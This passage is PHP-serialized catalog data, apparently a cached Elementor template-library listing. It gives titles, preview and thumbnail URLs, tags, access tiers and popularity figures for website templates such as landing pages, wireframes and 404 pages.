Business\";s:9:\"thumbnail\";s:83:\"https://library.elementor.com/wp-content/uploads/2021/05/Library-Pic-Dog-Walker.png\";s:12:\"tmpl_created\";i:1621336601;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:121:\"https://library.elementor.com/lp/dog-walker-business/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:8:\"Business\";s:4:\"tags\";s:41:\"[\"Business\",\"Dog\",\"Landing Pages\",\"Pets\"]\";s:10:\"menu_order\";i:24;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:237;a:21:{s:4:\"tmpl\";i:1238;s:2:\"id\";i:21349;s:5:\"title\";s:29:\"Architecture &#8211; Projects\";s:9:\"thumbnail\";s:85:\"https://library.elementor.com/wp-content/uploads/2021/12/23-Projects-Architecture.jpg\";s:12:\"tmpl_created\";i:1638820870;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:120:\"https://library.elementor.com/architecture-projects/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:70:\"[\"Architecture\",\"Creative\",\"Creative Portfolio\",\"Portfolio\",\"Project\"]\";s:10:\"menu_order\";i:24;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:238;a:21:{s:4:\"tmpl\";i:1034;s:2:\"id\";i:15075;s:5:\"title\";s:34:\"Slide-In | Menu | Flooring Company\";s:9:\"thumbnail\";s:68:\"https://library.elementor.com/wp-content/uploads/2020/08/PopUp-1.png\";s:12:\"tmpl_created\";i:1597739605;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:136:\"https://library.elementor.com/popups/slide-in-menu-flooring-company/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:8:\"slide-in\";s:4:\"tags\";s:39:\"[\"Flooring company\",\"Flooring website\"]\";s:10:\"menu_order\";i:25;s:16:\"popularity_index\";i:383;s:11:\"trend_index\";i:162;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:239;a:21:{s:4:\"tmpl\";i:1414;s:2:\"id\";i:24079;s:5:\"title\";s:32:\"Fashion Shop &#8211; Coming Soon\";s:9:\"thumbnail\";s:85:\"https://library.elementor.com/wp-content/uploads/2022/04/Coming-Soon-Fashion-Shop.jpg\";s:12:\"tmpl_created\";i:1650988089;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:123:\"https://library.elementor.com/fashion-shop-coming-soon/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:88:\"[\"Aesthetic\",\"Business\",\"Coming Soon\",\"Ecommerce\",\"Girly\",\"Lifestyle\",\"Products\",\"Shop\"]\";s:10:\"menu_order\";i:25;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:240;a:21:{s:4:\"tmpl\";i:1195;s:2:\"id\";i:18761;s:5:\"title\";s:33:\"Fashion Store &#8211; Coming Soon\";s:9:\"thumbnail\";s:86:\"https://library.elementor.com/wp-content/uploads/2021/05/Library-Pic-Fashion-Store.png\";s:12:\"tmpl_created\";i:1621336146;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:127:\"https://library.elementor.com/lp/fashion-store-coming-soon/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:16:\"Coming Soon Page\";s:4:\"tags\";s:56:\"[\"Coming Soon\",\"Fashion\",\"Landing Pages\",\"Shop\",\"store\"]\";s:10:\"menu_order\";i:25;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:241;a:21:{s:4:\"tmpl\";i:1153;s:2:\"id\";i:17060;s:5:\"title\";s:36:\"Private Tutor &#8211; Online Service\";s:9:\"thumbnail\";s:75:\"https://library.elementor.com/wp-content/uploads/2021/01/Online-Tutor-2.png\";s:12:\"tmpl_created\";i:1610631042;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:130:\"https://library.elementor.com/lp/private-tutor-online-service/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:14:\"Online Service\";s:4:\"tags\";s:64:\"[\"Education\",\"Landing Pages\",\"Online Service\",\"Teacher\",\"Tutor\"]\";s:10:\"menu_order\";i:26;s:16:\"popularity_index\";i:780;s:11:\"trend_index\";i:628;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:242;a:21:{s:4:\"tmpl\";i:1430;s:2:\"id\";i:24434;s:5:\"title\";s:25:\"Wireframe &#8211; About 3\";s:9:\"thumbnail\";s:82:\"https://library.elementor.com/wp-content/uploads/2022/05/Wireframe-—-About-3.jpg\";s:12:\"tmpl_created\";i:1653988697;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:116:\"https://library.elementor.com/wireframe-about-3/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:76:\"[\"About\",\"Business\",\"Contact\",\"Faq\",\"Footer\",\"Header\",\"Professional\",\"Team\"]\";s:10:\"menu_order\";i:26;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:243;a:21:{s:4:\"tmpl\";i:1158;s:2:\"id\";i:17232;s:5:\"title\";s:33:\"Life Coach &#8211; Online Service\";s:9:\"thumbnail\";s:71:\"https://library.elementor.com/wp-content/uploads/2021/01/Life-Coach.png\";s:12:\"tmpl_created\";i:1610902793;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:127:\"https://library.elementor.com/lp/life-coach-online-service/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:14:\"Online Service\";s:4:\"tags\";s:38:\"[\"Coach\",\"Landing Pages\",\"Life Coach\"]\";s:10:\"menu_order\";i:27;s:16:\"popularity_index\";i:787;s:11:\"trend_index\";i:751;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:244;a:21:{s:4:\"tmpl\";i:1436;s:2:\"id\";i:24515;s:5:\"title\";s:28:\"Wireframe &#8211; Services 3\";s:9:\"thumbnail\";s:85:\"https://library.elementor.com/wp-content/uploads/2022/05/Wireframe-—-Services-3.jpg\";s:12:\"tmpl_created\";i:1653988946;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:119:\"https://library.elementor.com/wireframe-services-3/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:66:\"[\"Business\",\"Contact\",\"Footer\",\"Header\",\"Professional\",\"Services\"]\";s:10:\"menu_order\";i:27;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:245;a:21:{s:4:\"tmpl\";i:875;s:2:\"id\";i:11241;s:5:\"title\";s:36:\"Classic | Digital Agency | Marketing\";s:9:\"thumbnail\";s:72:\"https://library.elementor.com/wp-content/uploads/2019/07/PopUp_small.jpg\";s:12:\"tmpl_created\";i:1564643043;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:138:\"https://library.elementor.com/popups/classic-digital-agency-marketing/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:28;s:16:\"popularity_index\";i:362;s:11:\"trend_index\";i:315;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:246;a:21:{s:4:\"tmpl\";i:1146;s:2:\"id\";i:16932;s:5:\"title\";s:35:\"Finance Consulting &#8211; Business\";s:9:\"thumbnail\";s:79:\"https://library.elementor.com/wp-content/uploads/2021/01/Finance-Consulting.png\";s:12:\"tmpl_created\";i:1610532170;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:129:\"https://library.elementor.com/lp/finance-consulting-business/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:8:\"Business\";s:4:\"tags\";s:80:\"[\"Advisor\",\"Business\",\"Consulting\",\"Finance\",\"Investment\",\"Landing Pages\",\"Tax\"]\";s:10:\"menu_order\";i:28;s:16:\"popularity_index\";i:790;s:11:\"trend_index\";i:630;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:247;a:21:{s:4:\"tmpl\";i:1429;s:2:\"id\";i:24421;s:5:\"title\";s:25:\"Wireframe &#8211; About 2\";s:9:\"thumbnail\";s:82:\"https://library.elementor.com/wp-content/uploads/2022/05/Wireframe-—-About-2.jpg\";s:12:\"tmpl_created\";i:1653988579;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:116:\"https://library.elementor.com/wireframe-about-2/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:87:\"[\"About\",\"Business\",\"Contact\",\"Faq\",\"Features\",\"Footer\",\"Header\",\"Professional\",\"Team\"]\";s:10:\"menu_order\";i:28;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:248;a:21:{s:4:\"tmpl\";i:674;s:2:\"id\";i:8505;s:5:\"title\";s:11:\"404 page 01\";s:9:\"thumbnail\";s:64:\"https://library.elementor.com/wp-content/uploads/2018/05/001.jpg\";s:12:\"tmpl_created\";i:1526415501;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:117:\"https://library.elementor.com/blocks/404-page-01/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:8:\"404 page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:28;s:16:\"popularity_index\";i:533;s:11:\"trend_index\";i:222;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:249;a:21:{s:4:\"tmpl\";i:1136;s:2:\"id\";i:16721;s:5:\"title\";s:35:\"Dental &#8211; Health &amp; Fitness\";s:9:\"thumbnail\";s:67:\"https://library.elementor.com/wp-content/uploads/2021/01/Dental.jpg\";s:12:\"tmpl_created\";i:1610448567;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:123:\"https://library.elementor.com/lp/dental-health-fitness/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:18:\"Health and Fitness\";s:4:\"tags\";s:44:\"[\"Dental\",\"Doctor\",\"Health\",\"Landing Pages\"]\";s:10:\"menu_order\";i:29;s:16:\"popularity_index\";i:801;s:11:\"trend_index\";i:655;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:250;a:21:{s:4:\"tmpl\";i:1417;s:2:\"id\";i:24116;s:5:\"title\";s:32:\"Tech Company &#8211; Coming Soon\";s:9:\"thumbnail\";s:85:\"https://library.elementor.com/wp-content/uploads/2022/04/Coming-Soon-Tech-Company.jpg\";s:12:\"tmpl_created\";i:1650989265;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:123:\"https://library.elementor.com/tech-company-coming-soon/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:87:\"[\"Business\",\"Coding\",\"Coming Soon\",\"Computer\",\"Developer\",\"IT\",\"Services\",\"Technology\"]\";s:10:\"menu_order\";i:29;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:251;a:21:{s:4:\"tmpl\";i:675;s:2:\"id\";i:8511;s:5:\"title\";s:11:\"404 page 02\";s:9:\"thumbnail\";s:64:\"https://library.elementor.com/wp-content/uploads/2018/05/002.jpg\";s:12:\"tmpl_created\";i:1526415528;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:117:\"https://library.elementor.com/blocks/404-page-02/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:8:\"404 page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:29;s:16:\"popularity_index\";i:347;s:11:\"trend_index\";i:155;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:252;a:21:{s:4:\"tmpl\";i:1161;s:2:\"id\";i:17269;s:5:\"title\";s:34:\"Electronics Sale &#8211; eCommerce\";s:9:\"thumbnail\";s:80:\"https://library.elementor.com/wp-content/uploads/2021/01/Electronic-Products.png\";s:12:\"tmpl_created\";i:1610903298;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:128:\"https://library.elementor.com/lp/electronics-sale-ecommerce/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:9:\"eCommerce\";s:4:\"tags\";s:29:\"[\"Ecommerce\",\"Landing Pages\"]\";s:10:\"menu_order\";i:30;s:16:\"popularity_index\";i:800;s:11:\"trend_index\";i:556;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:253;a:21:{s:4:\"tmpl\";i:1220;s:2:\"id\";i:20908;s:5:\"title\";s:42:\"Packing &#038; Moving Company &#8211; Home\";s:9:\"thumbnail\";s:90:\"https://library.elementor.com/wp-content/uploads/2021/12/3-Home-Packing-Moving-Company.jpg\";s:12:\"tmpl_created\";i:1638786127;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:126:\"https://library.elementor.com/packing-moving-company-home/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:28:\"[\"Movers\",\"Moving\",\"Storge\"]\";s:10:\"menu_order\";i:30;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:254;a:21:{s:4:\"tmpl\";i:1152;s:2:\"id\";i:17032;s:5:\"title\";s:42:\"Donate Computer &#8211; Social Involvement\";s:9:\"thumbnail\";s:71:\"https://library.elementor.com/wp-content/uploads/2021/01/Donation-2.png\";s:12:\"tmpl_created\";i:1610630585;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:136:\"https://library.elementor.com/lp/donate-computer-social-involvement/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:18:\"Social Involvement\";s:4:\"tags\";s:67:\"[\"Computer\",\"Donate\",\"Donation\",\"Kids\",\"Landing Pages\",\"Nonprofit\"]\";s:10:\"menu_order\";i:31;s:16:\"popularity_index\";i:718;s:11:\"trend_index\";i:278;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:255;a:21:{s:4:\"tmpl\";i:672;s:2:\"id\";i:8512;s:5:\"title\";s:11:\"404 page 03\";s:9:\"thumbnail\";s:64:\"https://library.elementor.com/wp-content/uploads/2018/05/003.jpg\";s:12:\"tmpl_created\";i:1526415449;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:117:\"https://library.elementor.com/blocks/404-page-03/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:8:\"404 page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:31;s:16:\"popularity_index\";i:450;s:11:\"trend_index\";i:375;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:256;a:21:{s:4:\"tmpl\";i:1245;s:2:\"id\";i:21546;s:5:\"title\";s:28:\"Interior Design &#8211; Home\";s:9:\"thumbnail\";s:85:\"https://library.elementor.com/wp-content/uploads/2021/12/1-Home-Interior-Design-1.jpg\";s:12:\"tmpl_created\";i:1639046269;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:119:\"https://library.elementor.com/interior-design-home/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:68:\"[\"Design\",\"Form\",\"Furniture Design\",\"Interior Design\",\"Testimonial\"]\";s:10:\"menu_order\";i:31;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:257;a:21:{s:4:\"tmpl\";i:1135;s:2:\"id\";i:16684;s:5:\"title\";s:34:\"SaaS HR Management &#8211; Product\";s:9:\"thumbnail\";s:66:\"https://library.elementor.com/wp-content/uploads/2021/01/lp_hr.png\";s:12:\"tmpl_created\";i:1609945486;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:128:\"https://library.elementor.com/lp/saas-hr-management-product/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:7:\"Product\";s:4:\"tags\";s:39:\"[\"HR\",\"Landing Pages\",\"Product\",\"SaaS\"]\";s:10:\"menu_order\";i:32;s:16:\"popularity_index\";i:708;s:11:\"trend_index\";i:292;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:258;a:21:{s:4:\"tmpl\";i:671;s:2:\"id\";i:8513;s:5:\"title\";s:11:\"404 page 04\";s:9:\"thumbnail\";s:64:\"https://library.elementor.com/wp-content/uploads/2018/05/004.jpg\";s:12:\"tmpl_created\";i:1526415417;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:117:\"https://library.elementor.com/blocks/404-page-04/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:8:\"404 page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:32;s:16:\"popularity_index\";i:420;s:11:\"trend_index\";i:176;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:259;a:21:{s:4:\"tmpl\";i:1249;s:2:\"id\";i:22137;s:5:\"title\";s:31:\"Design Blog &#8211; Coming Soon\";s:9:\"thumbnail\";s:94:\"https://library.elementor.com/wp-content/uploads/2021/10/Design-Blog-Coming-Soon-250x280-1.jpg\";s:12:\"tmpl_created\";i:1647177194;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:122:\"https://library.elementor.com/design-blog-coming-soon/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:47:\"[\"Blog\",\"Coming Soon\",\"Design\",\"Landing Pages\"]\";s:10:\"menu_order\";i:32;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:260;a:21:{s:4:\"tmpl\";i:1134;s:2:\"id\";i:16660;s:5:\"title\";s:37:\"Medical center &#8211; Online service\";s:9:\"thumbnail\";s:95:\"https://library.elementor.com/wp-content/uploads/2021/01/Online-medical-cosultation-250_280.png\";s:12:\"tmpl_created\";i:1609945122;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:131:\"https://library.elementor.com/lp/medical-center-online-service/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:14:\"Online Service\";s:4:\"tags\";s:44:\"[\"Landing Pages\",\"Medical\",\"Online Service\"]\";s:10:\"menu_order\";i:33;s:16:\"popularity_index\";i:750;s:11:\"trend_index\";i:332;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:261;a:21:{s:4:\"tmpl\";i:1226;s:2:\"id\";i:21069;s:5:\"title\";s:21:\"Hotel &#8211; Contact\";s:9:\"thumbnail\";s:76:\"https://library.elementor.com/wp-content/uploads/2021/12/9-Contact-Hotel.jpg\";s:12:\"tmpl_created\";i:1638798545;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:112:\"https://library.elementor.com/hotel-contact/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:36:\"[\"Contact\",\"from\",\"Info\",\"Vacation\"]\";s:10:\"menu_order\";i:33;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:262;a:21:{s:4:\"tmpl\";i:1150;s:2:\"id\";i:17001;s:5:\"title\";s:36:\"Parental Counseling &#8211; Business\";s:9:\"thumbnail\";s:78:\"https://library.elementor.com/wp-content/uploads/2021/01/Parenting-Coach-2.png\";s:12:\"tmpl_created\";i:1610534999;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:130:\"https://library.elementor.com/lp/parental-counseling-business/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:8:\"Business\";s:4:\"tags\";s:99:\"[\"Advisor\",\"Business\",\"Coach\",\"Counseling\",\"Landing Pages\",\"Online 